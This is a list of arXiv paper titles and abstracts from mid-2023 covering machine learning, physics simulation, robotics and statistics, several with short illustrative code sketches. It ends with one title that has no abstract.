In this paper, we present a novel approach for improving the quality and consistency of generated outputs from large-scale pre-trained language models (LLMs). Self-consistency has emerged as an effective approach for prompts with fixed answers, selecting the answer with the highest number of votes. In this paper, we introduce a generalized framework for self-consistency that extends its applicability beyond problems that have fixed answers. Through extensive simulations, we demonstrate that our approach consistently recovers the optimal or near-optimal generation from a set of candidates. We also propose lightweight parameter-free similarity functions that show significant and consistent improvements across code generation, autoformalization, and summarization tasks, even without access to token log probabilities. Our method incurs minimal computational overhead, requiring no auxiliary reranker models or modifications to the existing model.
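The generalized self-consistency idea, picking the generation that is most similar on average to the other sampled candidates under a lightweight parameter-free similarity, can be sketched as follows. Token-set Jaccard is used here as a stand-in for the paper's similarity functions:

```python
def jaccard(a, b):
    """Token-overlap similarity between two generations (parameter-free)."""
    ta, tb = set(a.split()), set(b.split())
    return len(ta & tb) / len(ta | tb)

def self_consistent_pick(candidates):
    """Return the candidate most similar on average to all the others,
    generalizing majority voting to open-ended outputs."""
    return max(candidates,
               key=lambda c: sum(jaccard(c, o) for o in candidates if o is not c))

samples = [
    "def add(a, b): return a + b",
    "def add(a, b): return a + b  # sum",
    "def add(x, y): return x * y",
]
print(self_consistent_pick(samples))
```

On this toy set the two agreeing completions reinforce each other, so the outlier (the multiplication variant) is never selected.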
    Improved selective background Monte Carlo simulation at Belle II with graph attention networks and weighted events. (arXiv:2307.06434v1 [hep-ex])
When measuring rare processes at Belle II, a huge luminosity is required, which means a large number of simulations are necessary to determine signal efficiencies and background contributions. However, this process demands high computation costs while most of the simulated data, in particular in the case of background, are discarded by the event selection. Thus, filters using graph neural networks are introduced at an early stage to save the resources for the detector simulation and reconstruction of events discarded at analysis level. In our work, we improved the performance of the filters using graph attention and investigated statistical methods including sampling and reweighting to deal with the biases introduced by the filtering.
    Why Guided Dialog Policy Learning performs well? Understanding the role of adversarial learning and its alternative. (arXiv:2307.06721v1 [cs.CL])
    Dialog policies, which determine a system's action based on the current state at each dialog turn, are crucial to the success of the dialog. In recent years, reinforcement learning (RL) has emerged as a promising option for dialog policy learning (DPL). In RL-based DPL, dialog policies are updated according to rewards. The manual construction of fine-grained rewards, such as state-action-based ones, to effectively guide the dialog policy is challenging in multi-domain task-oriented dialog scenarios with numerous state-action pair combinations. One way to estimate rewards from collected data is to train the reward estimator and dialog policy simultaneously using adversarial learning (AL). Although this method has demonstrated superior performance experimentally, it is fraught with the inherent problems of AL, such as mode collapse. This paper first identifies the role of AL in DPL through detailed analyses of the objective functions of dialog policy and reward estimator. Next, based on these analyses, we propose a method that eliminates AL from reward estimation and DPL while retaining its advantages. We evaluate our method using MultiWOZ, a multi-domain task-oriented dialog corpus.
    Breaking 3-Factor Approximation for Correlation Clustering in Polylogarithmic Rounds. (arXiv:2307.06723v1 [cs.DS])
    In this paper, we study parallel algorithms for the correlation clustering problem, where every pair of two different entities is labeled with similar or dissimilar. The goal is to partition the entities into clusters to minimize the number of disagreements with the labels. Currently, all efficient parallel algorithms have an approximation ratio of at least 3. In comparison with the $1.994+\epsilon$ ratio achieved by polynomial-time sequential algorithms [CLN22], a significant gap exists. We propose the first poly-logarithmic depth parallel algorithm that achieves a better approximation ratio than 3. Specifically, our algorithm computes a $(2.4+\epsilon)$-approximate solution and uses $\tilde{O}(m^{1.5})$ work. Additionally, it can be translated into a $\tilde{O}(m^{1.5})$-time sequential algorithm and a poly-logarithmic rounds sublinear-memory MPC algorithm with $\tilde{O}(m^{1.5})$ total memory. Our approach is inspired by Awerbuch, Khandekar, and Rao's [AKR12] length-constrained multi-commodity flow algorithm, where we develop an efficient parallel algorithm to solve a truncated correlation clustering linear program of Charikar, Guruswami, and Wirth [CGW05]. Then we show the solution of the truncated linear program can be rounded with a factor of at most 2.4 loss by using the framework of [CMSY15]. Such a rounding framework can then be implemented using parallel pivot-based approaches.
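For context, the 3-approximation that this paper improves upon is achieved by the classic randomized Pivot algorithm, sketched below on a toy instance. The paper's own algorithm instead rounds a truncated linear program; this sketch only illustrates the baseline being beaten:

```python
import random

def pivot_correlation_clustering(nodes, similar, seed=0):
    """Classic randomized Pivot (3-approximation in expectation): repeatedly
    pick a random pivot and cluster it with every still-unclustered node
    labeled similar to it."""
    rng = random.Random(seed)
    unclustered, clusters = set(nodes), []
    while unclustered:
        pivot = rng.choice(sorted(unclustered))
        cluster = {pivot} | {v for v in unclustered
                             if (min(pivot, v), max(pivot, v)) in similar}
        clusters.append(cluster)
        unclustered -= cluster
    return clusters

# '+' (similar) edges of a toy instance: a triangle {0,1,2} and a pair {3,4}
similar = {(0, 1), (0, 2), (1, 2), (3, 4)}
print(pivot_correlation_clustering(range(5), similar))
```

On this instance every pivot order recovers the two natural clusters; the paper's LP-rounding approach is what pushes the worst-case factor below 3.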
    Embodied Lifelong Learning for Task and Motion Planning. (arXiv:2307.06870v1 [cs.RO])
    A robot deployed in a home over long stretches of time faces a true lifelong learning problem. As it seeks to provide assistance to its users, the robot should leverage any accumulated experience to improve its own knowledge to become a more proficient assistant. We formalize this setting with a novel lifelong learning problem formulation in the context of learning for task and motion planning (TAMP). Exploiting the modularity of TAMP systems, we develop a generative mixture model that produces candidate continuous parameters for a planner. Whereas most existing lifelong learning approaches determine a priori how data is shared across task models, our approach learns shared and non-shared models and determines which to use online during planning based on auxiliary tasks that serve as a proxy for each model's understanding of a state. Our method exhibits substantial improvements in planning success on simulated 2D domains and on several problems from the BEHAVIOR benchmark.
    A survey on deep learning approaches for data integration in autonomous driving system. (arXiv:2306.11740v2 [cs.RO] UPDATED)
    The perception module of self-driving vehicles relies on a multi-sensor system to understand its environment. Recent advancements in deep learning have led to the rapid development of approaches that integrate multi-sensory measurements to enhance perception capabilities. This paper surveys the latest deep learning integration techniques applied to the perception module in autonomous driving systems, categorizing integration approaches based on "what, how, and when to integrate". A new taxonomy of integration is proposed, based on three dimensions: multi-view, multi-modality, and multi-frame. The integration operations and their pros and cons are summarized, providing new insights into the properties of an "ideal" data integration approach that can alleviate the limitations of existing methods. After reviewing hundreds of relevant papers, this survey concludes with a discussion of the key features of an optimal data integration approach.
    Vehicle Dispatching and Routing of On-Demand Intercity Ride-Pooling Services: A Multi-Agent Hierarchical Reinforcement Learning Approach. (arXiv:2307.06742v1 [eess.SY])
The integrated development of city clusters has given rise to an increasing demand for intercity travel. Intercity ride-pooling service exhibits considerable potential in upgrading traditional intercity bus services by implementing demand-responsive enhancements. Nevertheless, its online operations suffer from inherent complexities due to the coupling of vehicle resource allocation among cities and pooled-ride vehicle routing. To tackle these challenges, this study proposes a two-level framework designed to facilitate online fleet management. Specifically, a novel multi-agent feudal reinforcement learning model is proposed at the upper level of the framework to cooperatively assign idle vehicles to different intercity lines, while the lower level updates the routes of vehicles using an adaptive large neighborhood search heuristic. Numerical studies based on the realistic dataset of Xiamen and its surrounding cities in China show that the proposed framework effectively mitigates the supply and demand imbalances, and achieves significant improvement in both the average daily system profit and order fulfillment ratio.
    HyperDreamBooth: HyperNetworks for Fast Personalization of Text-to-Image Models. (arXiv:2307.06949v1 [cs.CV])
Personalization has emerged as a prominent aspect within the field of generative AI, enabling the synthesis of individuals in diverse contexts and styles, while retaining high-fidelity to their identities. However, the process of personalization presents inherent challenges in terms of time and memory requirements. Fine-tuning each personalized model needs considerable GPU time investment, and storing a personalized model per subject can be demanding in terms of storage capacity. To overcome these challenges, we propose HyperDreamBooth, a hypernetwork capable of efficiently generating a small set of personalized weights from a single image of a person. By composing these weights into the diffusion model, coupled with fast finetuning, HyperDreamBooth can generate a person's face in various contexts and styles, with high subject details while also preserving the model's crucial knowledge of diverse styles and semantic modifications. Our method achieves personalization on faces in roughly 20 seconds, 25x faster than DreamBooth and 125x faster than Textual Inversion, using as few as one reference image, with the same quality and style diversity as DreamBooth. Our method also yields a model that is 10000x smaller than a normal DreamBooth model. Project page: https://hyperdreambooth.github.io
    S-HR-VQVAE: Sequential Hierarchical Residual Learning Vector Quantized Variational Autoencoder for Video Prediction. (arXiv:2307.06701v1 [cs.CV])
    We address the video prediction task by putting forth a novel model that combines (i) our recently proposed hierarchical residual vector quantized variational autoencoder (HR-VQVAE), and (ii) a novel spatiotemporal PixelCNN (ST-PixelCNN). We refer to this approach as a sequential hierarchical residual learning vector quantized variational autoencoder (S-HR-VQVAE). By leveraging the intrinsic capabilities of HR-VQVAE at modeling still images with a parsimonious representation, combined with the ST-PixelCNN's ability at handling spatiotemporal information, S-HR-VQVAE can better deal with chief challenges in video prediction. These include learning spatiotemporal information, handling high dimensional data, combating blurry prediction, and implicit modeling of physical characteristics. Extensive experimental results on the KTH Human Action and Moving-MNIST tasks demonstrate that our model compares favorably against top video prediction techniques both in quantitative and qualitative evaluations despite a much smaller model size. Finally, we boost S-HR-VQVAE by proposing a novel training method to jointly estimate the HR-VQVAE and ST-PixelCNN parameters.
    Unsupervised Calibration through Prior Adaptation for Text Classification using Large Language Models. (arXiv:2307.06713v1 [cs.CL])
    A wide variety of natural language tasks are currently being addressed with large-scale language models (LLMs). These models are usually trained with a very large amount of unsupervised text data and adapted to perform a downstream natural language task using methods like fine-tuning, calibration or in-context learning. In this work, we propose an approach to adapt the prior class distribution to perform text classification tasks without the need for labelled samples and with only a few in-domain sample queries. The proposed approach treats the LLM as a black box, adding a stage where the model posteriors are calibrated to the task. Results show that these methods outperform the un-adapted model for different numbers of training shots in the prompt, as well as a previous approach where calibration is performed without using any adaptation data.
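The general idea of adapting a black-box model's class prior can be sketched as posterior reweighting. The estimator below, which approximates the model's implicit prior by its average posterior over a few unlabelled in-domain queries, is our illustrative assumption and not necessarily the paper's exact calibration stage:

```python
import numpy as np

def adapt_prior(posteriors, new_prior):
    # posteriors: (n, C) black-box class probabilities for n queries.
    # Approximate the model's implicit prior by the average posterior
    # (an assumption for this sketch), then reweight toward new_prior.
    model_prior = posteriors.mean(axis=0)
    adapted = posteriors * (new_prior / model_prior)
    return adapted / adapted.sum(axis=1, keepdims=True)   # renormalize rows

P = np.array([[0.8, 0.2], [0.4, 0.6]])
balanced = adapt_prior(P, np.array([0.5, 0.5]))
```

When `new_prior` equals the estimated implicit prior, the reweighting is a no-op, which is a useful sanity check.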
    Cramer Type Distances for Learning Gaussian Mixture Models by Gradient Descent. (arXiv:2307.06753v1 [cs.LG])
    The learning of Gaussian Mixture Models (also referred to simply as GMMs) plays an important role in machine learning. Known for their expressiveness and interpretability, Gaussian mixture models have a wide range of applications, from statistics and computer vision to distributional reinforcement learning. However, as of today, few known algorithms can fit or learn these models, some of which include Expectation-Maximization algorithms and Sliced Wasserstein Distance. Even fewer algorithms are compatible with gradient descent, the common learning process for neural networks. In this paper, we derive a closed formula for the distance between two GMMs in the univariate, one-dimensional case, then propose a distance function called the Sliced Cram\'er 2-distance for learning general multivariate GMMs. Our approach has several advantages over many previous methods. First, it has a closed-form expression for the univariate case and is easy to compute and implement using common machine learning libraries (e.g., PyTorch and TensorFlow). Second, it is compatible with gradient descent, which enables us to integrate GMMs with neural networks seamlessly. Third, it can fit a GMM not only to a set of data points, but also to another GMM directly, without sampling from the target model. And fourth, it has some theoretical guarantees like global gradient boundedness and unbiased sampling gradient. These features are especially useful for distributional reinforcement learning and Deep Q Networks, where the goal is to learn a distribution over future rewards. We will also construct a Gaussian Mixture Distributional Deep Q Network as a toy example to demonstrate its effectiveness. Compared with previous models, this model is parameter efficient in terms of representing a distribution and possesses better interpretability.
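The third advantage, fitting one GMM directly to another by gradient descent, can be illustrated numerically. The sketch below approximates the univariate Cramér-2 distance (the integral of the squared CDF difference) on a fixed grid rather than using the paper's closed form, and keeps the mixture weights fixed for simplicity; all parameter values are illustrative:

```python
import torch

def gmm_cdf(x, weights, means, stds):
    # CDF of a univariate Gaussian mixture evaluated at the points x
    z = (x[:, None] - means[None, :]) / stds[None, :]
    return (weights[None, :] * 0.5 * (1 + torch.erf(z / 2 ** 0.5))).sum(dim=1)

def cramer2(p, q, grid):
    # Cramer-2 distance approximated on a uniform grid:
    # integral over x of (F_p(x) - F_q(x))^2
    dx = grid[1] - grid[0]
    return ((gmm_cdf(grid, *p) - gmm_cdf(grid, *q)) ** 2).sum() * dx

# Fixed target mixture and a learnable mixture fit to it by gradient descent
target = (torch.tensor([0.5, 0.5]), torch.tensor([-2.0, 2.0]), torch.tensor([0.5, 0.5]))
weights = torch.tensor([0.5, 0.5])                 # kept fixed for simplicity
means = torch.tensor([-1.0, 1.0], requires_grad=True)
log_stds = torch.zeros(2, requires_grad=True)      # parametrize stds > 0

grid = torch.linspace(-8.0, 8.0, 2001)
opt = torch.optim.Adam([means, log_stds], lr=0.05)
for _ in range(300):
    opt.zero_grad()
    loss = cramer2((weights, means, log_stds.exp()), target, grid)
    loss.backward()
    opt.step()
```

No samples are drawn from the target at any point, which is exactly what makes this objective attractive for distributional RL targets.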
    A Novel Bayes' Theorem for Upper Probabilities. (arXiv:2307.06831v1 [stat.ML])
    In their seminal 1990 paper, Wasserman and Kadane establish an upper bound for the Bayes' posterior probability of a measurable set $A$, when the prior lies in a class of probability measures $\mathcal{P}$ and the likelihood is precise. They also give a sufficient condition for such upper bound to hold with equality. In this paper, we introduce a generalization of their result by additionally addressing uncertainty related to the likelihood. We give an upper bound for the posterior probability when both the prior and the likelihood belong to a set of probabilities. Furthermore, we give a sufficient condition for this upper bound to become an equality. This result is interesting on its own, and has the potential of being applied to various fields of engineering (e.g. model predictive control), machine learning, and artificial intelligence.
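The upper posterior probability in the precise-likelihood special case can be made concrete with a tiny discrete sketch. The paper additionally lets the likelihood vary over a set; here only the prior varies, and all numbers are illustrative:

```python
import numpy as np

# Discrete sketch: parameter theta in {0, 1, 2} and the likelihood of one
# observed data point under each value (illustrative numbers)
likelihood = np.array([0.7, 0.2, 0.1])

# A finite set of candidate priors standing in for the class of priors P
priors = np.array([
    [0.6, 0.3, 0.1],
    [0.3, 0.4, 0.3],
    [0.1, 0.3, 0.6],
])

A = np.array([True, False, True])        # the event A = {theta in {0, 2}}

def posterior_prob(prior):
    post = prior * likelihood            # Bayes' rule, unnormalized
    return post[A].sum() / post.sum()

upper = max(posterior_prob(p) for p in priors)   # upper posterior probability of A
lower = min(posterior_prob(p) for p in priors)
```

The paper's contribution is a bound (and equality condition) for this supremum when both the prior and the likelihood range over sets, rather than enumerating as above.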
    Frameless Graph Knowledge Distillation. (arXiv:2307.06631v1 [cs.LG])
    Knowledge distillation (KD) has shown great potential for transferring knowledge from a complex teacher model to a simple student model in which the heavy learning task can be accomplished efficiently and without losing too much prediction accuracy. Recently, many attempts have been made to apply the KD mechanism to graph representation learning models such as graph neural networks (GNNs) to accelerate the model's inference speed via student models. However, many existing KD-based GNNs utilize MLP as a universal approximator in the student model to imitate the teacher model's process without considering the graph knowledge from the teacher model. In this work, we provide a KD-based framework on multi-scaled GNNs, known as graph framelet, and prove that by adequately utilizing the graph knowledge in a multi-scaled manner provided by graph framelet decomposition, the student model is capable of adapting to both homophilic and heterophilic graphs and has the potential of alleviating the over-squashing issue with a simple yet effective graph surgery. Furthermore, we show how the graph knowledge supplied by the teacher is learned and digested by the student model via both algebra and geometry. Comprehensive experiments show that our proposed model can achieve learning accuracy identical to or even surpassing the teacher model while maintaining the high speed of inference.
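The framelet-specific machinery is beyond the scope of an abstract, but the generic distillation objective that such frameworks build on is standard: a temperature-softened KL term against the teacher plus a cross-entropy term against the labels. A minimal sketch (hyperparameters `T` and `alpha` are illustrative defaults, not the paper's settings):

```python
import torch
import torch.nn.functional as F

def kd_loss(student_logits, teacher_logits, labels, T=2.0, alpha=0.5):
    # Soft term: KL divergence between temperature-softened class distributions;
    # the T*T factor keeps gradient magnitudes comparable across temperatures
    soft = F.kl_div(
        F.log_softmax(student_logits / T, dim=1),
        F.softmax(teacher_logits / T, dim=1),
        reduction="batchmean",
    ) * (T * T)
    # Hard term: ordinary cross-entropy against the ground-truth labels
    hard = F.cross_entropy(student_logits, labels)
    return alpha * soft + (1 - alpha) * hard
```

If the student reproduces the teacher's logits exactly, the soft term vanishes and only the label term remains, which is a convenient sanity check.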
    Testing Sparsity Assumptions in Bayesian Networks. (arXiv:2307.06406v1 [stat.ML])
    Bayesian network (BN) structure discovery algorithms typically either make assumptions about the sparsity of the true underlying network, or are limited by computational constraints to networks with a small number of variables. While these sparsity assumptions can take various forms, frequently the assumptions focus on an upper bound for the maximum in-degree of the underlying graph $\nabla_G$. Theorem 2 in Duttweiler et al. (2023) demonstrates that the largest eigenvalue of the normalized inverse covariance matrix ($\Omega$) of a linear BN is a lower bound for $\nabla_G$. Building on this result, this paper provides the asymptotic properties of, and a debiasing procedure for, the sample eigenvalues of $\Omega$, leading to a hypothesis test that may be used to determine if the BN has max in-degree greater than 1. A linear BN structure discovery workflow is suggested in which the investigator uses this hypothesis test to aid in selecting an appropriate structure discovery algorithm. The hypothesis test performance is evaluated through simulations and the workflow is demonstrated on data from a human psoriasis study.
    Machine Learning practices and infrastructures. (arXiv:2307.06518v1 [cs.CY])
    Machine Learning (ML) systems, particularly when deployed in high-stakes domains, are deeply consequential. They can exacerbate existing inequities, create new modes of discrimination, and reify outdated social constructs. Accordingly, the social context (i.e. organisations, teams, cultures) in which ML systems are developed is a site of active research for the field of AI ethics, and intervention for policymakers. This paper focuses on one aspect of social context that is often overlooked: interactions between practitioners and the tools they rely on, and the role these interactions play in shaping ML practices and the development of ML systems. In particular, through an empirical study of questions asked on the Stack Exchange forums, the use of interactive computing platforms (e.g. Jupyter Notebook and Google Colab) in ML practices is explored. I find that interactive computing platforms are used in a host of learning and coordination practices, which constitutes an infrastructural relationship between interactive computing platforms and ML practitioners. I describe how ML practices are co-evolving alongside the development of interactive computing platforms, and highlight how this risks making invisible aspects of the ML life cycle that AI ethics researchers have demonstrated to be particularly salient for the societal impact of deployed ML systems.
    MPR-Net:Multi-Scale Pattern Reproduction Guided Universality Time Series Interpretable Forecasting. (arXiv:2307.06736v1 [cs.LG])
    Time series forecasting has received wide interest from existing research due to its broad applications and inherent challenges. The research challenge lies in identifying effective patterns in historical series and applying them to future forecasting. Advanced models based on point-wise connected MLP and Transformer architectures have strong fitting power, but their quadratic computational complexity limits practicality. Additionally, those structures inherently disrupt the temporal order, reducing the information utilization and making the forecasting process uninterpretable. To solve these problems, this paper proposes a forecasting model, MPR-Net. It first adaptively decomposes multi-scale historical series patterns using a convolution operation, then constructs a pattern extension forecasting method based on the prior knowledge of pattern reproduction, and finally reconstructs future patterns into future series using a deconvolution operation. By leveraging the temporal dependencies present in the time series, MPR-Net not only achieves linear time complexity, but also makes the forecasting process interpretable. Through extensive experiments on more than ten real datasets covering both short- and long-term forecasting tasks, MPR-Net achieves state-of-the-art forecasting performance, as well as good generalization and robustness.
    A Novel Site-Agnostic Multimodal Deep Learning Model to Identify Pro-Eating Disorder Content on Social Media. (arXiv:2307.06775v1 [cs.LG])
    Over the last decade, there has been a vast increase in eating disorder diagnoses and eating disorder-attributed deaths, reaching their zenith during the Covid-19 pandemic. This immense growth derived in part from the stressors of the pandemic but also from increased exposure to social media, which is rife with content that promotes eating disorders. Such content can induce eating disorders in viewers. This study aimed to create a multimodal deep learning model capable of determining whether a given social media post promotes eating disorders based on a combination of visual and textual data. A labeled dataset of Tweets was collected from Twitter, upon which twelve deep learning models were trained and tested. Based on model performance, the most effective deep learning model was the multimodal fusion of the RoBERTa natural language processing model and the MaxViT image classification model, attaining accuracy and F1 scores of 95.9% and 0.959 respectively. The RoBERTa and MaxViT fusion model, deployed to classify an unlabeled dataset of posts from the social media sites Tumblr and Reddit, generated classifications similar to those of previous research studies that did not employ artificial intelligence, showing that artificial intelligence can develop insights congruent to those of researchers. Additionally, the model was used to conduct a time-series analysis of yet unseen Tweets from eight Twitter hashtags, uncovering that the relative abundance of pro-eating disorder content has decreased drastically. However, since approximately 2018, pro-eating disorder content has either stopped its decline or risen once more in prevalence.
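A multimodal fusion of a text model and an image model typically means concatenating the two embedding vectors and passing them through a small classification head. The sketch below is a generic late-fusion head; the embedding dimensions and layer sizes are illustrative stand-ins, not the paper's RoBERTa/MaxViT configuration:

```python
import torch
import torch.nn as nn

class FusionHead(nn.Module):
    # Late multimodal fusion: concatenate text and image embeddings, then
    # classify. Dimensions are illustrative stand-ins for the backbones.
    def __init__(self, text_dim=768, image_dim=512, n_classes=2):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(text_dim + image_dim, 256),
            nn.ReLU(),
            nn.Linear(256, n_classes),
        )

    def forward(self, text_emb, image_emb):
        return self.net(torch.cat([text_emb, image_emb], dim=1))

head = FusionHead()
logits = head(torch.zeros(4, 768), torch.zeros(4, 512))   # batch of 4 posts
```

In practice the text and image embeddings would come from the (frozen or fine-tuned) backbone encoders applied to each post's caption and attached image.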
    inTformer: A Time-Embedded Attention-Based Transformer for Crash Likelihood Prediction at Intersections Using Connected Vehicle Data. (arXiv:2307.03854v2 [cs.LG] UPDATED)
    The real-time crash likelihood prediction model is an essential component of the proactive traffic safety management system. Over the years, numerous studies have attempted to construct a crash likelihood prediction model in order to enhance traffic safety, but mostly on freeways. In the majority of the existing studies, researchers have primarily employed a deep learning-based framework to identify crash potential. Lately, Transformer has emerged as a potential deep neural network that fundamentally operates through attention-based mechanisms. Transformer has several functional benefits over extant deep learning models such as Long Short-Term Memory (LSTM), Convolution Neural Network (CNN), etc. Firstly, Transformer can readily handle long-term dependencies in a data sequence. Secondly, Transformers can process all elements in a data sequence in parallel during training. Finally, a Transformer does not have the vanishing gradient issue. Realizing the immense possibility of Transformers, this paper proposes inTersection-Transformer (inTformer), a time-embedded attention-based Transformer model that can effectively predict intersection crash likelihood in real-time. The proposed model was evaluated using connected vehicle data extracted from INRIX and Center for Advanced Transportation Technology (CATT) Lab's Signal Analytics Platform. The data were formatted in parallel and stacked at different timesteps to develop nine inTformer models. The best inTformer model achieved a sensitivity of 73%. This model was also compared to earlier studies on crash likelihood prediction at intersections and with several established deep learning models trained on the same connected vehicle dataset. In every scenario, this inTformer outperformed the benchmark models, confirming the viability of the proposed inTformer architecture.
    An Improved Uniform Convergence Bound with Fat-Shattering Dimension. (arXiv:2307.06644v1 [cs.LG])
    The fat-shattering dimension characterizes the uniform convergence property of real-valued functions. The state-of-the-art upper bounds feature a multiplicative squared logarithmic factor on the sample complexity, leaving an open gap with the existing lower bound. We provide an improved uniform convergence bound that closes this gap.
    GRAN is superior to GraphRNN: node orderings, kernel- and graph embeddings-based metrics for graph generators. (arXiv:2307.06709v1 [cs.LG])
    A wide variety of generative models for graphs have been proposed. They are used in drug discovery, road networks, neural architecture search, and program synthesis. Generating graphs has theoretical challenges, such as isomorphic representations -- evaluating how well a generative model performs is difficult. Which model should one choose for a given application domain? We extensively study kernel-based metrics on distributions of graph invariants and manifold-based and kernel-based metrics in graph embedding space. Manifold-based metrics outperform kernel-based metrics in embedding space. We use these metrics to compare GraphRNN and GRAN, two well-known generative models for graphs, and unveil the influence of node orderings. The comparison shows the superiority of GRAN over GraphRNN; further, our proposed adaptation of GraphRNN with a depth-first search ordering is effective for small-sized graphs. A guideline on good practices regarding dataset selection and node feature initialization is provided. Our work is accompanied by open-source code and reproducible experiments.
    Temporal Label-Refinement for Weakly-Supervised Audio-Visual Event Localization. (arXiv:2307.06385v1 [cs.CV])
    Audio-Visual Event Localization (AVEL) is the task of temporally localizing and classifying \emph{audio-visual events}, i.e., events simultaneously visible and audible in a video. In this paper, we solve AVEL in a weakly-supervised setting, where only video-level event labels (their presence/absence, but not their locations in time) are available as supervision for training. Our idea is to use a base model to estimate labels on the training data at a finer temporal resolution than at the video level and re-train the model with these labels. That is, we determine the subset of labels for each \emph{slice} of frames in a training video by (i) replacing the frames outside the slice with those from a second video having no overlap in video-level labels, and (ii) feeding this synthetic video into the base model to extract labels for just the slice in question. To handle the out-of-distribution nature of our synthetic videos, we propose an auxiliary objective for the base model that induces more reliable predictions of the localized event labels as desired. Our three-stage pipeline outperforms several existing AVEL methods with no architectural changes and improves performance on a related weakly-supervised task as well.
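Step (i) of the label-refinement idea, splicing a slice of one video into a label-disjoint second video, is a simple array operation. A minimal sketch treating videos as frame arrays (shapes and values are illustrative):

```python
import numpy as np

def synthesize_slice(video_a, video_b, start, end):
    # Keep frames [start, end) from video_a and fill the rest with frames from
    # video_b, a video sharing no video-level labels with video_a. Feeding the
    # result to the base model yields labels attributable to the slice alone.
    out = video_b.copy()
    out[start:end] = video_a[start:end]
    return out

a = np.ones((10, 2))    # stand-in for a (frames, features) video
b = np.zeros((10, 2))
s = synthesize_slice(a, b, 3, 6)
```

Any event label the base model still predicts for `s` can then be credited to frames 3-5 of `video_a`, since `video_b` cannot have contributed it.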
    Tackling Combinatorial Distribution Shift: A Matrix Completion Perspective. (arXiv:2307.06457v1 [cs.LG])
    Obtaining rigorous statistical guarantees for generalization under distribution shift remains an open and active research area. We study a setting we call combinatorial distribution shift, where (a) under the test- and training-distributions, the labels $z$ are determined by pairs of features $(x,y)$, (b) the training distribution has coverage of certain marginal distributions over $x$ and $y$ separately, but (c) the test distribution involves examples from a product distribution over $(x,y)$ that is not covered by the training distribution. Focusing on the special case where the labels are given by bilinear embeddings into a Hilbert space $H$: $\mathbb{E}[z \mid x,y ]=\langle f_{\star}(x),g_{\star}(y)\rangle_{{H}}$, we aim to extrapolate to a test distribution domain that is not covered in training, i.e., achieving bilinear combinatorial extrapolation. Our setting generalizes a special case of matrix completion from missing-not-at-random data, for which all existing results require the ground-truth matrices to be either exactly low-rank, or to exhibit very sharp spectral cutoffs. In this work, we develop a series of theoretical results that enable bilinear combinatorial extrapolation under gradual spectral decay as observed in typical high-dimensional data, including novel algorithms, generalization guarantees, and linear-algebraic results. A key tool is a novel perturbation bound for the rank-$k$ singular value decomposition approximations between two matrices that depends on the relative spectral gap rather than the absolute spectral gap, a result that may be of broader independent interest.
    Discovering How Agents Learn Using Few Data. (arXiv:2307.06640v1 [cs.GT])
    Decentralized learning algorithms are an essential tool for designing multi-agent systems, as they enable agents to autonomously learn from their experience and past interactions. In this work, we propose a theoretical and algorithmic framework for real-time identification of the learning dynamics that govern agent behavior using a short burst of a single system trajectory. Our method identifies agent dynamics through polynomial regression, where we compensate for limited data by incorporating side-information constraints that capture fundamental assumptions or expectations about agent behavior. These constraints are enforced computationally using sum-of-squares optimization, leading to a hierarchy of increasingly better approximations of the true agent dynamics. Extensive experiments demonstrated that our approach, using only 5 samples from a short run of a single trajectory, accurately recovers the true dynamics across various benchmarks, including equilibrium selection and prediction of chaotic systems up to 10 Lyapunov times. These findings suggest that our approach has significant potential to support effective policy and decision-making in strategic multi-agent systems.
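The backbone of the identification step, regressing next-step behavior on polynomial features of the current state, can be sketched without the sum-of-squares side-information machinery. Below, a short chaotic trajectory of the logistic map (an illustrative system, not one of the paper's benchmarks) is enough to recover the exact dynamics by least squares:

```python
import numpy as np

def fit_poly_dynamics(x, deg=2):
    # Regress x_{t+1} on polynomial features of x_t via least squares
    X = np.vander(x[:-1], deg + 1, increasing=True)   # columns: 1, x, x^2, ...
    coef, *_ = np.linalg.lstsq(X, x[1:], rcond=None)
    return coef

# Logistic map x_{t+1} = r x_t (1 - x_t): a few samples of one trajectory suffice
r, x = 3.7, [0.4]
for _ in range(8):
    x.append(r * x[-1] * (1 - x[-1]))
coef = fit_poly_dynamics(np.array(x))   # expect coefficients [0, r, -r]
```

The paper's contribution is what happens when data is this scarce but noisy: side-information constraints (enforced via sum-of-squares optimization) regularize the regression toward dynamically plausible solutions.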
    Quantum Autoencoders for Learning Quantum Channel Codes. (arXiv:2307.06622v1 [quant-ph])
    This work investigates the application of quantum machine learning techniques for classical and quantum communication across different qubit channel models. By employing parameterized quantum circuits and a flexible channel noise model, we develop a machine learning framework to generate quantum channel codes and evaluate their effectiveness. We explore classical, entanglement-assisted, and quantum communication scenarios within our framework. Applying it to various quantum channel models as proof of concept, we demonstrate strong performance in each case. Our results highlight the potential of quantum machine learning in advancing research on quantum communication systems, enabling a better understanding of capacity bounds under modulation constraints, various communication settings, and diverse channel models.
    Data Augmentation is a Hyperparameter: Cherry-picked Self-Supervision for Unsupervised Anomaly Detection is Creating the Illusion of Success. (arXiv:2208.07734v5 [cs.LG] UPDATED)
    Self-supervised learning (SSL) has emerged as a promising alternative for creating supervisory signals for real-world problems, avoiding the extensive cost of manual labeling. SSL is particularly attractive for unsupervised tasks such as anomaly detection (AD), where labeled anomalies are rare or often nonexistent. A large catalog of augmentation functions has been used for SSL-based AD (SSAD) on image data, and recent works have reported that the type of augmentation has a significant impact on accuracy. Motivated by these findings, this work sets out to put image-based SSAD under a larger lens and investigate the role of data augmentation in SSAD. Through extensive experiments on 3 different detector models and across 420 AD tasks, we provide comprehensive numerical and visual evidence that the alignment between data augmentation and the anomaly-generating mechanism is the key to the success of SSAD, and that in its absence, SSL may even impair accuracy. To the best of our knowledge, this is the first meta-analysis on the role of data augmentation in SSAD.
    DRAGON: A Dialogue-Based Robot for Assistive Navigation with Visual Language Grounding. (arXiv:2307.06924v1 [cs.RO])
    Persons with visual impairments (PwVI) have difficulties understanding and navigating spaces around them. Current wayfinding technologies either focus solely on navigation or provide limited communication about the environment. Motivated by recent advances in visual-language grounding and semantic navigation, we propose DRAGON, a guiding robot powered by a dialogue system and the ability to associate the environment with natural language. By understanding the commands from the user, DRAGON is able to guide the user to the desired landmarks on the map, describe the environment, and answer questions from visual observations. Through effective utilization of dialogue, the robot can ground the user's free-form descriptions to landmarks in the environment, and give the user semantic information through spoken language. We conduct a user study with blindfolded participants in an everyday indoor environment. Our results demonstrate that DRAGON is able to communicate with the user smoothly, provide a good guiding experience, and connect users with their surrounding environment in an intuitive manner.
    Sequential Experimental Design for X-Ray CT Using Deep Reinforcement Learning. (arXiv:2307.06343v1 [eess.IV])
